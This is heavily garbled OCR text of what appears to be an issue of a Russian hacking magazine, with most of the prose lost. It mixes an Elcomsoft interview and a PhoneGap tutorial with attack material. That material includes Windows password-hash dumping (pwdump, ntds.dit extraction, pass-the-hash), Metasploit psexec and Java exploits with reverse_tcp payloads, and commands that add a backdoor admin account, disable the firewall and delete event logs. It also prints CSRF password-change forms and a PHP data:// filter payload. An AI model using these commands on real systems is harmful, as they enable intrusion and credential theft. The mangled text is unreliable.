    $img = imagecreatefromjpeg(
        $_FILES["file"]["tmp_name"][$key]);
    imagejpeg($img, './new_' . $key . '_.jpg');
    ImageDestroy($img);

Array
(
[goodvar_] =>
[goodarray] => Array
(
(foo) =>

}
(badvar _ _ ] =>
l.jpg ,
, ,
S- Contet-Ty pe:

php://filter/read%3dconvert.lightning_template_filter/

Array
(
(goodvar_] =>
(goodarray) => Array
(
[foo] =>

resource%3d
data://text/plain%3bbase64,eyUgaWYgcHJpbnRfcihpbmlfZ2V0X2
FsbCgpKSAlfQ
,
! , ,

, imageceatefomjpeg .

(badvar_ . [] =>

,
,
.

, .

$_FILES,
.

[Screenshot: bugs.php.net bug #54939, "file path injection vulnerability in RFC1867 file ... filename"; status: Closed; PHP version: 5.3.6]

, .
, - ,
n


, , . ::

029

COVERSTORY

S,

&

. .

- : n:
~~ n.

E\comsoft.

ona:~vanced eBook ss,


n_~1 ,

- Defcon .

r.t

.... ,
IT, , ?
il !

~ . .- . ][J,
, 6. -

100 .

20


. ,
- ... , ,
- ,
. -
.


.
,

- ,
. ,
, - ...

<< ,
.
, , . <<>>

<<

4,5
6 .

91- .
,
,- .
,
. - , .

COVERSTORY
, ,

Elcomsoft,

, , ,

. ,

. , ,

, . :

, :

<<, >>.

, ,

. n

. -

, .

... .

r.1

APPLE

.:;.t ,
,

, ,

r.1

, .

.:;.t ELCOMSOF

ADOBE

?
l ,

l ,

~ ,

compute foesics.

, ,

~ ,

passwod v, ,

- ,

. , ,

, ...

Apple

. , ,

, .

, .

, ,

Recovey . -

[ 97- !

. ,

compute

Active

EFS

diectoy.

r.1

. . . PDF
ELCOMSOF ... ?

foesics . ,

pdf .
~

, ,

. : << , ,

>>.

IT.

80 %.

l ,

. ,
.

,
,

r.1

.:;.t ADVANCED
PROCESSOR,

, -

2001

DEFCON?

l , . ,

~ ,
<<

>>.

. :1

df-, .

, Defco

2001

, - .

1 ,

2001

~ ,

, - .

- .

, .

, ,

. ,

, <<

. 90-

, .

>>. , ,

- ,

Defco.

, ,

, .

, ,

, ,

ELCOMSOFT.

r,1

Elcomsoft,

12

20

Adobe.

, <<

Def co ,

.:;.t >> .

Advaced

1 .

1 , , , ...

. ,

~
Access, . ,
... .

~ ,

, ,

, ,

Apple, iOS [ ,
iPhoe 45 iPad21.

. -

, .

, -

, ,

032

eBook

ss,

? :1


. ,
.
- , .

, , ,
,
, .
- .

r.1

1.;.1 ? <<
>> ?

l _ .

~ ,
,

21

.
,

11

-,
,

.
,
. -
, ,

, ... ,

. :) ,

, - .
,

. ,
,
.

- .
, - ...

, .

r.1

l , ... ,

, ,

1.;.1 ADOBE

. ,

, .

- Spot the fed ! ).

. ,

l , , -,

, , .

~ Adobe

!, ),

. <<>> -

Adobe,

Adobe

, -

-.

, , .

, : <<,

<<>>. ,

, , >> .

, ,

- ,

: <<n>>,

. ,

, ,

, , ,

-,

, .

11

. .

, -

r.1

, .

, ,

Elcomsoft.

1.;.1

, ,

<<

, , .

<<n

>> .

, ,

. .

. :

, ,

l ~

<<, >>. ,

~ ,

, .

- <<>>.


COVERSTORY
, .

? ,

, .

- ?


n. ,

, , , ,

l .

. ,

~ .

. ,

, .

, -

Hackes Oevelopes

>> >> .

, .

r.1

. . . ?
l , l -)

~ 50
, Elcomsoft.

Laten,

Kit,

Canon

n ,

.
CONFidece

, ,

Magic

r.1

~-

2.0.

Niko

. lus-)

, .

. . . , ?

, .

, . ,

.
,

l ,

, . .

. .

, -

, .

r.1

6 ,

2001

2002

. ,

5-10

. . . ,
,


. ,

Nikon

r.1

. . .
.

l ,

~ , Pactical

! ),

cyptogaphy

l , ...

. , ,

, ,

~ . ,

. ... ,

, , -

, .

depositio

! ) -

. , .
, , .

. ,
: -

?>>.

r.1
. . . ?

, .

, :

Elcomsoft

, ,

, , ,

2001

...

l , .

~ ,

. ,

- ,

r.1

, ,

. . . 2002.

, . ,

r.1

, , ,

Elcomsoft
~ ,

CONFIOENCE 2.0
. . .
CANON.

Puic

lteest l. ,

1 %

. ,

l ,

. ,

~ I) .

- : n

. ,

>>.

. .

, n

, ,

, ,

Elcomsoft

17

3000, ,
3500.

, ,
. n

300,

IT,

,
. :::


Preview

30 .
.

11,

n n
n n

: n ~ n
~n ~ n

.
. n

n
.
n n
n n, n

Lotus Domino

Contolle n n
.
n, n,
n I

PCZONE

36

HTML5

A nd oid

n n,

? n.

- .

n n

, n

n .

n .

iOS,

MALWARE

500 n,
. n
n .


DUQU

n
,
n n n

Stuxnet.

I!
,

MBR,

n,

5 nn
.

035

PCZONE

PhoneGap:o

HTML5

- ,

,
.

iOS,

todo list

Windows 8,

, , , n

HTML5.

n, .
, n n
n n

Adroid

, -

, - , n

CSS!,

PhoneGap. n

HTML, JavaSc i pt

n n nn n:

Windows Phone,

lk,

WebOS,

Symian

iOS, Andoid,
Bada.

n n n

. , n

Objective-C

Java

PhoneGap.

[n, Objective-C iOS), API


n n,-

PhoneGap API.

HTML5

L-, << >> , !

API

n n

, n n n

: , n, [
), n , ,
! ) , . .
,

._.....

-~ --

---

...........

- .
n jQuey Moile Secha,
,

[ n ) .
n , n

, n n n .
- .

iOS- -,

AppStoe, n

:). : ,

036

iOS

, , , Andoid. ,
n ,


PhoneGap: HTML5


, jQuey Moile.
JS-

n [ n

l n . ,
,
! JQue y Moile

[jqueymoile.com/download l n n
n, :

images/ [n n
jq-moilel;

index.css;
index.html;
index .js;
jquey.js;

jquey.moile.min.css;
jquey.moile . min.js.

,
. n
index.html.
, <<
>> << >>.

<div data-role="page" data-dom-cache="true" class="page-map" id="index">
<div data-role="header">
<h1> n </h1>
<a href="#points" class="ui-btn-right" id="menu-points" data-transition="pop"> To </a>
</div>
<div data-role="content">
<div id="map-canvas">
<!-- -->

, .

iOS .

</div>
</div>
</div>
data-dom-cache="true" ,

n n << n ,

. <<>>

n, : <<

data-transition="pop", << n >>

, . AppStoe

<< n >>. ,

, n >> ,

jQuey Moi l e, [ it.ly/vtXXM I .

n . ,
n. ,
n n
.
, ,

PHONEGAP

. :
n -n , n
, PhoneGap n iOS.

PhoneGap

n , n n

<< >> . !

J S- jQuey jQue y Mobile [ jqueymobile . com l,

PhoneGap Build [build .phonegap.com l n .

- Google Maps v.

: n .

. ,

, n

, .

[ << >>!. ,

- <<

>>

API.

. lgithub.com/

phonegap/phonegap-p luginsl,
iPhone, Android, Palm, Bla ckBerry. iOS
20 r: BarcodeScann er [ -!. AdPIugi [ iAdl, Nati veCont rol s l iOS

locaiStoage .

l .

<< >>, -
<< >>. n,

EnableViewportScale
Externa!Hosts

n :

ltemO
ltem 1

cdiv data-role= "page" data-dom-cache="true"


class="page-pints" id= "points" >
cdiv data-role= "header" >
<!--

ltem 2
ltem 3
MediaPiaybackRequiresUserAction

-->

href= "#" data-theme="b" data-icon= "delete"

Boolean

00 Array

id= "delete-all" >Ya </>

String
String
String

..

NO

(41tems)
csi .gstatic.com

.googleapis.com
maps.goog le.com

String
Boolean

maps.gstatic.com
NO

ExternaiHosts

chl>Toc/hl>

//
self.addPoint(event. latlng,
self.options.radius, message);
self.updatePointslist(); // q

</>

});

</div>

}, false );

<!--n

-->

href="#index" class= "ui-btn-right"


data-transition="pop" data-direction= "reverse" >

n - .

cdiv>
<!-- -->

n n n

<ul id="list" data-role="listview" data-inset="true" data-split-icon="delete">
</ul>
</div>
</div>

. nn

if (navigator.geolocation) {

/1

n <<>> nn data-tansition=>>pop>>,

data-diection=>>evese>>,
<<>> <<>>.
nn . , .

API Google Maps,

Geolocation AP I

!, n n l:

function gpsSuccess(pos) {
    var lat, lng;
    if (pos.coords) {
        lat = pos.coords.latitude;
        lng = pos.coords.longitude;
    } else {
        lat = pos.latitude;
        lng = pos.longitude;
    }
    self.movePerson(new gm.LatLng(lat, lng));
}


var latlng = new gm.LatLng(this.options.lat, this.options.lng);
this.map = new gm.Map(element, {
    zoom: this.options.zoom,
    center: latlng,
    mapTypeId: gm.MapTypeId.ROADMAP,
    disableDoubleClickZoom: true,
    disableDefaultUI: true

/1

/1

/1
window.setinterval( function () {

/1

n n

navigator.geolocation.getCurrentPosition(gpsSuccess, $.noop, {
    enableHighAccuracy: true,
maximumAge:

});

});

},

Maps.

Gm-

n,

Google

);

. - :

movePeson n n n

getPointslnBoundsll
this.person = new gm.Marker({
    map: this.map,
    icon: new gm.MarkerImage(PERSON_SPRITE_URL, new gm.Size(48, 48))

n, n

- . n-
n ?

HTML5

locaiStoage, n !n
,

l. , n,

});

, !

PERSON_SPRITE_URL n n
Ggl - . - maps.gstatic.
com/mapfiles/c/mod scou t/cb scout spite api OO . png .

, n

, , n,

n . n

click:

- n - Safai Chome.
,

n <<n>> .

gm.event.addListener(this.map, 'click', function (event) {
    self.requestMessage(function (err, message) {
11 , ut ,
        if (err) return;

/1

n h ~ -n n -

038


, n , , n

WebKit . ~


. , , n

Run-
iPhone/iPad

PhoneGap.
index.html ,- . ,

n n,
n

www.

<<t folde

efeences f

any added

foldes.

, .

www.

PhoneGap.

PhoneGap

phonegap-1.2 .0.js

. <<

>>. 5uppoting

plist,

Fil es/PhoneGap.

E xtenai H osts ,

( Google
Mapsl: *gstatic.c om, *googleapis.com, maps.google.com.
,

. -

DOMReady

jQuey :

$1documentl.eadyll. PhoneGap deviceeady,


, .
:

document.addEventListener( "deviceready" , function () {


new Notificator( $( "#map-canvas" )[ ));

/1
11

if (navigator.network.connection.type
Connection.NONE) {

navigator.notification.alert( "He -" ,

iOS

$.noop,

. - (n Denwe

TILE);

}, false);

XAMPPI, ,
.

n , . ,

-. ,

. navigato. notification.alet

alet, ,

PhoneGap,

. ,

, netwo k .

i05-. ,

connection I it . ly/uEyRwz l I it.ly/tkvzE2 1.

PhoneGap

IDE

i05,
05 10.6+ (
05 10.61, Xcode
i05 50 . 50 , n
Apple . Xcode i05 50 l deve l ope.

document.addEventListener("touchmove", function (event) {
    event.preventDefault();
}, false);

app l e . com/devcente/ i os/index.act i on l . ,

4 . , '
Apple (

alet confim ,
n

PhoneGap:

navigator.notification.confirm( 'Ya ?' ,

function (button_id) {

n , 5t,

!. ,

Objective-C.
PhoneGap,
PhoneGap i05.
lhttps://g ithub .com/callback/phonegap/zipba ll /1.2 .01,
i05 .
, Xcode PhoneGap.
i05

UI-

jQuery Moblle- ,

ile,


PhoneGap

IDE

Zepto.js

[phonegap.com/tools l: 5encha Touch, lmpact, Dojo Mo-

if (button_id === 1) { //
self.removePoint(point);

}
TILE );

},

, n,- , n
i.i n .

, n ln ,

l ,

56 .84484567007557 ...

Ph oneGap:

navigator.geolocation.watchPosition(function (position) {
    self.movePerson(new gm.LatLng(
        position.coords.latitude,
        position.coords.longitude));
}, function (error) {
    navigator.notification.alert(
        'code: ' + error.code + '\nmessage: ' + error.message,
        $.noop,

56.84583899763894 ...

hG-n

TILE

);

}' {

frequency:

iOS

iOS,

! , nn

iOS

D eve l ope

Pogaml. n

});

n n

IAndoid,
-
, . n

Run

Windows Phonel

App le,

n . ,

, n n n n

- . n

$99

, n

n .

iS - ' nn n

n n . n n

n nn

iPad

n,

n .

:1.

n Stoe.

$99 n n ,

n - .

iPhone, iPod
Xcode.

iOS

Apple

: n n

nn n n iS -

! , n
n n : it .l y/tD6xA !I . ,
n
. .
?

n -n
n n n

PhoneGap,

n ,

PhoneGap.

iOS n
Objective-C,

n n

n n n , n

. .

API PhoneGap.

n n, n An d o id

Appcelerator Titanium

lwww . appceleato. com l.

Titanium
iPhone,

Andoid

Moile

n
n lk.

, n n

nium

IDE .

Tita-

n, n

$49 ].

$120 . l t
, n

Titanium
25

. n n n

Apache 2.

7,

n, n !
:
n n

lphonegap .co m/apps ].

n -

iOS An-


n , -

: $199 n $349

iOS

Andoid. n n

IDE

n , JavaScipt.

01.0

PhoneGap-

n n n
n. n
, n n,

HTML+JS

- n

n , n n

doid. . ,

Ph oneGap,

n,

OpenGL.

phonegap .

com/sta t l . n ,

. n

Corona SDK l www . anscamoile . com/coona l .

Windows

, - n

. ,

Ph one Gap

n Nitoi

n l n n GitHub: github .com/


,

phonegap l.

n n Ni toi n

Adobe .

, nn n n n n

? ::


. .

PCZONE

Ant

la.zhukov!Oreal.xakep.rul


WINDOWS-APOE


WINDOWS-CCTEM

, ,

?
, .
:

S-, LM/NTLM- xe
;

LSA, LM/NTLM-xe

, ;

, Sh-
,

! , ,
! .
, -.
:

, ,

PWDUMP
FGDUMP

NTLM.
.
.

. NTLM / LM-xe
.
, DLL-
SeDebugPivilege . ,

la NT AUTHORIY\SYSTEMI .
, :

! Live CDI, , -t lwww.piotrbaia . com/all/kon-boot l,


.

l NT AUTHORITY\
SYSTEM l ,
Ea syHack .
.

pwd ump lwww.foofus .net/-fizzgig/pwdump l fgdump lwww.


foofus .net/-fizzgig/fgdump l.
, .
:

pwdump localhost
fgdump . exe

127.0.0.1.PWDUMP

l ! 127.0.0.1 .CACHEDUMP
l ! .


,
, .
, ,

pwdump,

> pwdump - mytarget . log -u MYDOMAIN \s omeuser


' lamepassword' 10 . 1.1.1
10.1.1 .1 -

, MYDOMAIN \

someuse- , la mepasswod-

, mytaget.log - .

pwdump, fgdump

> fgdump .exe -f hostfile . txt -u MYDOMAIN\someuser


1 >> -

hostfile.txt- ,

w n n n

pwdump

10

, <<-

! !.
,

fgdump.exe.

VOLUME SH AOOW

pwdump

n n n
Cedentials Edito (WCEI

Windows

vssown.vbs

SERVICE

fgdump

itools .l anmaste53 . co m /vss ow n . v bs l, .

, ,

. ,

SAM,

, . ,

cscript vssown. vbs /start.


cscript vssown.vbs /c reate.
: cscript vssown. vbs /list.

, -

Device object \\ ?\G LOBALROOT\


Device\HaddiskVolumeShadowCopy14 >> ! 14 -
!. .

. - ,

1.

, -

SYSTEM .

, ,
. , ,

\\?\GLOBALROOT \ Device\HarddiskVolume5hadowCopy14\
wi ndows\sys tem32 \ config \ SYSTEM .
\\?\GLOBALROOT \Device\HarddiskVolumeShadowCopy14\
windows\sys tem32 \co nfig \SAM .

, .
, >> ,

Volume Shadow Sevice ! ! .


Windows S v 2003.
, , System
Sta te ntbackup
IVolume Shadow f Shaed Folde s l .

2.

, -

SAM in side l i n si d ep o.com/us/saminsi d e.shtm l l


.

l ,

SAM SYSTEMI,

, ,
,
! ,

. ,

\\?\GLOBALROOT \ Device \ HarddiskVolume5hadowCopy14\


windows\ntds\ntds.dit .

Wi nd ows

SAM

SYSTEM. Active Di ecto y


NTDS.DIT, :

, ,

. , -

SYSTEM

NTDS.DIT,

SYSTEM.

n n ?

. _

, , n

LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\C uentVesion\


Winlogon\cachedlogonscount 0>>.

, .

csa b abata.com/down l oads/


NTDS.DIT

, .

Csaba t ,
NTDS.DI T .

PCZONE
ntds dump has h.zip. ,

n n BackTack5 !n
Linu-],
n . ,
.

libesedb:

cd libesedb
chmod + configure
./configure && make


SAMiside
:

.
, :

cd esedbtools
. / esedbdumphash .. / .. /ntds .dit
/l ibe sedb/esedbtools/ntds.dit.expot/datatable.
. ,

SYSTEM:

cd .. / .. /creddump/
python ./dsdump.py .. /SYSTEM
. /libesedb/esedbtools/ntds.dit.export/datatale
! !

> sudo . /hashgrab2.py


HashGrab v2.e smyen
http: // InterNeT.net
Contact: RuSH4ck3R[at]gmail(dot]com
[*] Mounted /dev/sdal to /mnt/jomATB
[*] Mounted /dev/sdl to / mnt / AZwJU s
[*] Copying SAM and SYSTEM files ...
[ * ] Unmounting partitions . ..
[ * ] Deleting mount directories ..
[*] Deleting [ ' . / jomATB']
>$ ls
hashgrab2.py jomATB.txt
>$ cat . /jomATB.txt
Administrator : HASH
Guest:Sel:HASH

! ] .

smyen : leee:s

, :

HomeGroupUser$:1882:HASH

python . / dsdumphistory .

. . /system .. /libesedb/esedbtools/ntds.dit.export / datatale.


,

! ] .

'

HASHGRAB2+
SAMDUMP2

METASPLOIT

, .
tt.

, .

Metasploit

, ,

. :

Famewok

LiveCO !,
Offline NT Passwod & Registy Edi t o],

meterpreter > run post/windows/gather/hashdump

- ,
.

HashGab2l py 1 337 . get- oot . com / too l s/has h gab2 .


.!] samsump2 l soucefoge.net/pojec t s /ophcack/ f iles /
samdump2 / 2.0.1],

Liv- . HashGab2

Metasploit-

PsExec:

Windows-pae, , n

SAM

samdump2
SYSTEM .

meterpreter > use exploit/windows/smb /psexec


SAMinside
insidepro.comlrus/sami nside.shtml

lm2ntcrack

ighashgpu

www.xmco.fr/lm2ntcracklindex .html

www gol ubev.com/ hashgpu.htm

NL-.

. N

. , -

, L- .

, L- ,

- .

NT -

ighshgu

n.

. ,

GU

, LM-apo-ADMINISTRATOR,

Windows

, , ,

lm2tca c k .

MD4, MD5, SHA1, NTLM,


11g, MySQL5, MSSQL.


meterpreter > set payload widows/meterpreter/reverse_tcp


meterpreter > set rhost ( ]
meterpreter > set smbpass (


meterpreter
meterpreter
meterpreter
meterpreter

> set smbuser [ ]


> set lhost [ ]
> exploit
> shell -


, ,
. ,

. ,

getsystem .
MS09-012,
MS10-015 [KiTrapDDI .
,

NTLM

NTML w

! w !

WINDOWS
CREDENTIALS EDITOR

PASS-THE-HASH

Cain&Abel-

WCE

Pass-the-Hash Toolkit'a,

. -

:1. -

[ NTLM/LM-xe !:

1997

Pass The Hash,

Pass-the-Hash Toolkit. [oss.


coresecu rity.com/projects/pshtoolkit.htmll: IAM.EXE, WHOSTHERE.
GENHASH .EXE. , GENHASH
LM- N- . WHOSTHERE.

wce.exe -1

, -,

- - :


. ,

, :

, / NL- . IAM.

wce.exe -s <userame>:<domai >:< lmhash >:<thas h> \


- <program> .

- ,

[ , , . .l,

,
,

wce.exe -s

:579118C49145815C47ECD267657D3174
Iteret Explorer \ iexplore . exe"

user:Victim:1F27ACDE849935BBAADB435B51484EE

"c: \ Program Files \

NL-,
, << .

<<-S << user


Victim, LM- NTLM-xe <<->>

, .

whosthere.exe-

, . :1

iam.exe -h

administrator:mydomain:AAD384358514@4EEAADB

4358514@4EE:31DCFEeD16AE931873C59D7EeCe89Ce

, , .

, [, l
, , ,

CUDA-Multiforcer

www.cypto h aze.co m /multi fo c e. php

,
. :::

ophcrack

John the Ripper

pfi cr ck.so urceforg . net

www.openwall .cam

n Windows

iw-.

NL-,

Vidia.

-. jum

, ,

inw-. ,

diff',

[ win321 .

MD5, NTLM, MD4, SHA1,


MSSQL, SHA, MD5_PS: md5[$pass.$saltl, MD5_SP:
md5[$salt.$passl, SSHA: base64[sha1 [$pass.$saltll,
DOUBLEMD5: md5[md5[$passil, TRIPLEMD5, LM:
Microsoft LaMan hash .


NTLM .


. , , Windows-ccee,
? . ,
? - ,
.

n n nwn

nn . n , ,

n n (

nmap, -

w),

ipconfig /all

ipconfig /displaydns

D NS-e .

-~

/U-. - ,

netstat -nabo
netstat -s


, .

' etsta t - [ , UDP, ICMP, IPI.

[tcpludplicpmlip]

: ..

j netstat -
: route print

: .

, ,

j netstat - 1 findstr :445

445.

net view

SMB [!.

net user %USERNAME% /domain

l. , ,

[ '/do m ai',
, . .

j net accounts

[ ! .

net accounts /domain

net localgroup administrators

net localgroup administrators /domain

>> .

net config workstation

: net share
;,


S - .
R- .

: type %WINDIR%\System32\drivers\etc\
j hosts

NetBIOS, , , , . .

hosts.


n enna - .

(n~~ :

n ( r ), ,
, , r nr . .

? .

whoami

'/all' 510 , 510 , !


whoami /all

? ! .

qwinsta

, , - . R- !
!, .
( uame !, , .


- .


set

: . USERDOMAIN, USERNAME, USERPRO; FILE, , LOGONSERVER, COMPUTERNAME, APPDATA, ALLUSERPROFILE. .

systeminfo (XP+I

; , , ,
: , , .
~ , .

qprocess

~ ,


SET


schtasks /query /fo csv /v >

~..

10

PID


J. ..~~.~~~~.~.~~~ ..:~~~~.~., ~~.~~~~.~.~~~.:' .~.'.........................................................!


~ csv, .

%%

, , ,

. , SYSTEM ( Wi7x64l. , , - do_so methig.bat


SYSTEM 15:41 , :
at 15 : 41 / interactive "d:\pentest\do_somethig.bat"
, .

at


~ , . at,

: schtasks (XP+I

net start

sc getkeyname ""
sc queryex ""

~~.~.~~.~.~~. ~~.~~~ ~~~~~.~~ .~~~~.~~~~~~.~~~~ .~~~.~~.~.~~~ .~.~~.~.~~~ ~ l~~.~~:.~.~.~.~. ~~~ ~ ~ 1................. ,.... .

sc query

PIO

key


tasklist (+)


taskkill [/f] /pid <pid>


taskkill [/f] /im <image_name>


PIO

.......

! .~.~~.til~si n~~ .~r.i~eS. .................... .........~.~~.~.~~.~.~~.~:.ll\. ~ ~~~~ l~~.~.~~~~~.~~~ ~ ~:.~~~~..~:..~~ ~.~~~.~~~.~~~~~.: ............................................... .
: gpresult

/z

- .



.-

nor. , noro. n ,
n .

, (, . . !.

wevtutil el

: wevtutil qe <LogName>

: ..

~~~~.~.~i~ c'..~.~~.~~.~.~.~~ ........ . ......

: del %WINDIR%\*.Iog / /s /q /f


~~~~~~~ ~.~~~~~~' ~~~............ ............ ...... ................ ..... ................... ............... ............................................................... .
WINDOWS.

Windows - n n
no n n n. -

n - nn.

%windir%\System32\cmd .exe /
''%SystemRoot%\syst em32\Dism .
/online /get-features

, .

Windows Vista SP1/7/2008/2008R2, no , te lnet ft- ..

%windir%\System32\cmd.exe /
''%SystemRoot%\system32\Dism.
" /online /enaie-feature 1
featurename:TFTP

TFTP. F - tftp.exe

system32.

Windows

Vista

ntsd.exe,

Ntsd -server tcp :port=1337 cal.exe


Ntsd -remote tcp:server=<ip-

[ ), - .

apec>, port=1337

[ ). <<.shell>>,
.

NTSD

B ack d oo.

i .

net use

- , n

n. n: w

, , n,

(n, n n).

reg save HKLM\Security security.


hive

~ security . , , system.


!. .

~~~-~-~-~--~~-~-~-~~-~ ~--~--~.:~~~~ ........... ..~~--~-~- -~-~-~~~ -~-~~~~-~-~-~-~ - SAM, ~ .~~~~-~:.~~~~--~~ -~--~-~~-~~-~~~-~-~~~: ............................. .......... .......... .

add

[\\

9. ][\
maln

etiPaddr\] [Re Do] g


g

!: ,
[ TagetiPadd l.
<<R EG ADD HKLM\Sof tware\MyCo /v Data /t REG_BINAR Y /d f e340ead >> [ : Oata,
~ : REG_BINARY, : fe340eadl .


reg export [RegDomain]\[Key]


[FileName]
reg import [FileName]
reg query [\\TargetiPaddr\J [RegDomain]\[ ] /v [Valuename!]


~ n .
.

; n n .

, , .

w , , :

sam_backup.dat?

w, ,- , .

tree C:\/f /> C:\output_ of_tree.txt

dir \ /s / 1 find

/1

"search_string"

: , .

d i 1\1 1/sl
ba se 1/bl se a c h_s t i n g, .

, ,

- WMI (Windows Management lnterfacel.

CWMIC

, WI- (WMICI:
, , .

wmic baseboard get Manufacturer, Model, Product, SerialNumber, Version

WMI

. , W I - lcompu t esyste m, bios, ,


, base b oadl n .
. .

wmic nicconfig get caption, macaddress, ipaddress, DefaultIPGateway

: , - , I- ,
.

wmic nicconfig where "IPEnabled = 'TRUE' and DNSDomain IS NOT NULL" get DefaultIPGateway, DHCPServer, DNSDomain, DNSHostName, DNSServerSearchOrder, IPAddress, IPSubnet, MACAddress, WINSEnableLMHostsLookup, WINSPrimaryServer, WINSSecondaryServer /format:list

wmic printer get Caption, Default, Direct, Description, Local, Shared, Sharename, Status

n , .

wmic os get bootdevice, caption, csname, currenttimezone, installdate, servicepackmajorversion, servicepackminorversion, systemdrive, version, windowsdirectory /format:list

wmic product get Caption, InstallDate, Vendor

wmic path win32_product where " name =


ware Update"' call Uninstal

'

Soft-

: Softwae Update.

, .


netuserhackerhacker/add

: net localgroup administrators /add hacker


. net localgroup administrators hacker /add
: net share nothing$=C :\ /grant:hacker,FULL /unlim: ited

hacke .

h acke .

: hacke .


: net user username /active:yes /domain


netsh firewall set opmode

disae

wmic product get name /value


wmic product where name="XXX" call uninstall/
nointeractive
rundll32.exe user32.dll, LockWorkStation

- ( , ) ,
.

Windows.

, -

( , ).

( ) .


/S

<<GreenDog , Digital Security ltwitter.com/a ntyurinl

MITM

RDP

Iir!!t.:t
.

-
. ,

51 [
RC4 ).

. , ,
,

. ?

, i-. ,

RDP,

. ,

D5- ,

[ . . ). .

: <<

Windows, 2000 [ ). .

~ .

n - ,

TLS .

g:l[ZyAQy).

[gQQ,
RDP MiTM,

, .

6-

. -

man-in-the-middle [MiTM),

Cain&Abel [www. oxid .i tl:

,
, n . ,

11

n ,

21 ARP ARP .
31 n.
L.l : ,

. ,
<< >>

MiTM

RDP.

, , , ,

Siffe S addess.

-, .

51 ap-poisoing .

, : ) .
i

RDP

6- :

. i-

ARP-RDP

RD- .

, , .

Ol ARP - DN S-. , <<

11

. ?

. ,

21
salt ' o. .

31 ,
.

L.l
.

050

. , ,

- longeek ' a

[goo.gi/Embxsl.

RD-,
, .

[goo.gl/pydMZI. ,
,

2003

RPD 5.0.


JAVA

,
,

Java,

, . ,
,

Fl ash,

Ja va

J v- .
, ,

. ?

. ? ':]

Java

, . javateste.og/

JavaScipt,

vesio.html .

Jv-,

. , ,

. ? ,
-

CVE-2010-4452,

Metasploit'e:

l defco- r ussia . u/wa ll. t x t ].


SET [Social gi Too lkit].


B ackTack

l www.social-e g i ee . og].

SET

, .

11 :
use exploit/widows/browser/java_codebase_trust
2) :
set URIPATH test.php
set LPORT 88
3) :
Set payload java/ meterpreter/ reverse_tcp
4) :
Exploit
tt
,

Ja va

:].

. : -

SET

1) Website Attack Vectos;


2) The Java Applet Attack Method;
3) Web Templates [
Site l ];
4) Gmail Gmail;
4) lmp otyouown executae,
.
- . ,
,

Java .

, ? ?

- .

? ?:] ,

, ,

- . ,

. ,

:11,

[ ).

. ,

, ,

- ,

. :

SMTP [25/I

. ,

Gmail

Mail.u.

www.example.com:25l. ,
nmap

, , , , ,

, -

, -. ,

. ?

150

. ,

IP.

UOP

ICMP,

l www . proxy . ru l, ,
.
. , security. nov. u
,
, ,

Proxy server

Use proxy server for your LAN (These settigs will t apply to
dial-up or VPN conections),

. :1
[ * ], [

Address:

Bypass proxy server for local addresses

pro)(y

-25


~['iiiiiiiiiiiiiiiiil]l

Port:

~ 1Advaced ...


REVERSE-POKC

~ , vs
. ? ,

-, [
) -
. ? . ,
vs-

-,

WAF

SS L- cepepa,

, [,
) .
.
,

[ ,

HP-traceroute.

Squid

reverse proxy

reverse-npoc Wikipedia.org

- ?).
.

vs-

, ,

- . ?

. ,

. ,

GET

POST,
TTL I- .

- .

. ,

- ,

X-F owaded-Fo,

- taceoute. , R -

, ! , -

-,

MaxFowads. ta ceo ut e,

lgoo.gi/VObeW). ,

RFC 2616

1.1,

Fowads . ,

TR ACE

OPTIONS.

RFC,

GET

I- .
:

HTTP-Traceroute.py -t www.victi m.com


GET/POST)

-m

CSRF

(TRACE/

.r\!
L LJ

. GET- an p oc- . ,

S?

CSR F [Coss Site Request Fg,

) . ,

- . ,
,

[, ) ,

[ ,
) . ,
, ,

<form name=passwd action="http://server.com/change_password.php" method="post">
<input type=hidden name=NP value=new_pass>
<input type="submit">
</form>
<script>document.passwd.submit();</script>

. ,
, n Ja vaSc ipt . ,
- -

anpoca? - XM L- a np oc.

XML-

:)

. .

G- : http://
seve.com/change_passwod.php? NP=ew_pass, ew_pass , . ,
L' :

<iframe src=http://server.com/change_password.php?NP=new_pass></iframe>
,


<form name=passwd ENCTYPE="text/plain" action="http://server.com/change_password.php" METHOD="POST">
<input type=hidden name='<?xml version' value='"1.0"?><User><Password>new_pass</Password></User>'>
</form>
<script>document.passwd.submit();</script>
, , . ; ) .


!, ,

er..i.r.~t
---

digital

foensicsl- ,
.
,

,-
.
, :

;
n ;

;
DLL- ;
;
;

;
Vitual Addess Descipto;
;
. .

,
, , ,

Volatility 19QQ]L

Hi5ip l. Python'e
Windows ! XPI, , 32- .

n .

imageinfo- ;
f d:\te st.aw- .
Volatility - . ;l
IWinX PSP3x86l,

, n

. , ?

, ,

!
!, , n
. ,

volatility pslist -f d:\test.raw --profile=WinXPSP3x86

MoonSols Dumplt ihttp://goo .gi/BY1QN J.

, , :

- :
.

volatility netscan -f d:\test.raw --profile=WinXPSP3x86

. , n ,

! ,
USBI.
, - ?

Volatilit y.

, Python'o,

- , ,
,

SAM, -
LSA?
Windows .

stndln- , .
, :

volatility.exe imageinfo -f d:\test.raw

volatility hivelist -f d:\test.raw

hivelist-

--profile=WinXPSP3x86

,
:

volatility hashdump -f d:\test.raw


- ls -s exelsese

--profile=WinXPSP3x86

hashdump-
103560- System;
s 180560- SAM.

, . ,
. ,

, .

Volatility.


[ivinside.iogspot.coml

[115612, . , .11

Microsoft Office 2007

Excel.xlb

CVSSV2: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)


[]]
:

5 2011 .
Aniway, abysssec, sinn, juan vazquez.
CVE: CVE-2011-0105.

n ,

. ,



, ,

Excel.

f:J!Iii

Excel

, ,

051,

! , ).

xl b.


start () ;

(CLASS SESSION ACTION ) ;


SsessionAction = - Sessi~nAction () ;
SselectedDocuments = SsessionAction ->get () ;
if( removeTrailingSlash ($sessionAction ->getFolder ())
&& sizeof ($selectedDocLJments ))

==

getParentPath ($ POST [ ' id ' ])

if(($ key = array search (basename ($ POST [ ' id ' ]) , $selected0ocuments )) !== false )
{

$selected0ocuments [$key ] = $ POST [ ' value ' ] ;


$sessionAction -> set ($selectedDocuments ) ;

}
baseame ( $ POST [ ' icJ ' ]) . "\n ";
displayArray ($selectedDocuments ) ;

-- removeTrailingSlash ($ POST [ ' id ' ]))

} elseif( removeTrailingSlash ( $ sessionActio -> getFolder ())

POST [ ' id ' ]) ;

S sessionActio -> setFolder ( $

writelnfo (ob get

l ()) ;

ajax _ save _name .php

BIFFB.

Bl FF-

BOF

Visua l Basic module


Works heet
Chart
BIFF4 Macro sheet
BIFF4 Work book globals

= workbook globals

Workbook globals

BOF

7.
,

EOF
BOF

worksheet
Sheet records

